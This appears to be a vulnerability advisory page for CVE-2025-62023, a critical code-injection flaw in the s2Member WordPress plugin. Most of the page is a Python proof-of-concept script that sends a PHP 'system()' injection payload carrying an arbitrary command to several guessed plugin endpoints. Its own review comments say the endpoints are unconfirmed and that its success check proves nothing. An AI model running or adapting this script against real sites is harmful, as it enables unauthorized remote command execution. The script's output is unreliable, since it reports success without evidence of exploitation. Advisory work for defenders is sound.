Improper Control of Generation of Code ('Code Injection') vulnerability in Cristián Lávaque s2Member s2member. This issue affects s2Member: from n/a through <= 250905.
CVSS Details
CVSS Score
9.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
Configurations (Affected Products)
No configuration data available.
s2Member Plugin <= 250905 (所有版本)
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
# CVE-2025-62023 PoC - s2Member Code Injection
# Target: WordPress site with s2Member plugin <= 250905
def exploit(target_url: str, cmd: str) -> bool:
    """
    POST the CVE-2025-62023 test string to a few candidate s2Member URLs.

    Builds one string from ``cmd``, sends it as the
    ``s2member_pro_login_user_login`` form field to three URLs derived from
    ``target_url``, and returns ``True`` as soon as any of them answers with
    HTTP 200. Returns ``False`` if every request raises or none returns 200.

    NOTE(review): an HTTP 200 only shows that the URL answered. Nothing in
    this function inspects the response body for evidence that the submitted
    string was interpreted, so a ``True`` result is not evidence that the site
    is vulnerable. The endpoint paths and parameter names used below are not
    confirmed against the plugin source anywhere on this page.

    :param target_url: Base URL of the site; one trailing ``/`` is stripped.
    :param cmd: Text embedded verbatim into the submitted string.
    :returns: ``True`` on the first HTTP 200 response, otherwise ``False``.
    """
    target = target_url.rstrip('/')
    # Injection point in s2Member plugin (as claimed by the page author;
    # the affected code path is not shown here)
    # The plugin fails to sanitize user-supplied input before code generation
    payload = f"'; system('{cmd}'); //"
    # Target endpoint - s2Member handles various AJAX and API calls
    # NOTE(review): these are guesses; the page gives no source reference
    # establishing that any of them reaches the vulnerable code.
    endpoints = [
        f"{target}/wp-admin/admin-ajax.php",
        f"{target}/?s2member_pro_login_widget=1",
        f"{target}/?s2member_pro_shortcode=1"
    ]
    for endpoint in endpoints:
        try:
            # The same form fields are sent to every candidate URL.
            params = {
                'action': 's2member_pro_login',
                's2member_pro_login_user_login': payload,
                's2member_pro_login_user_pass': 'test'
            }
            # verify=False disables TLS certificate validation for this
            # request; timeout=10 bounds each attempt to ten seconds.
            response = requests.post(endpoint, data=params, timeout=10, verify=False)
            # First 200 ends the loop; non-200 responses are silently skipped.
            if response.status_code == 200:
                print(f"[*] Request sent to {endpoint}")
                print(f"[*] Response length: {len(response.text)}")
                return True
        except requests.RequestException as e:
            # Connection/timeout errors are reported and the next URL is tried.
            print(f"[!] Error targeting {endpoint}: {e}")
    return False
if __name__ == "__main__":
    # Command-line entry point: <target_url> <command>.
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <command>")
        print(f"Example: python {sys.argv[0]} http://example.com 'id'")
        sys.exit(1)
    target_url = sys.argv[1]
    command = sys.argv[2]
    print(f"[*] Exploiting CVE-2025-62023 on {target_url}")
    print(f"[*] Executing command: {command}")
    # The return value of exploit() is discarded, so the process exits 0
    # whether or not any endpoint answered with HTTP 200.
    exploit(target_url, command)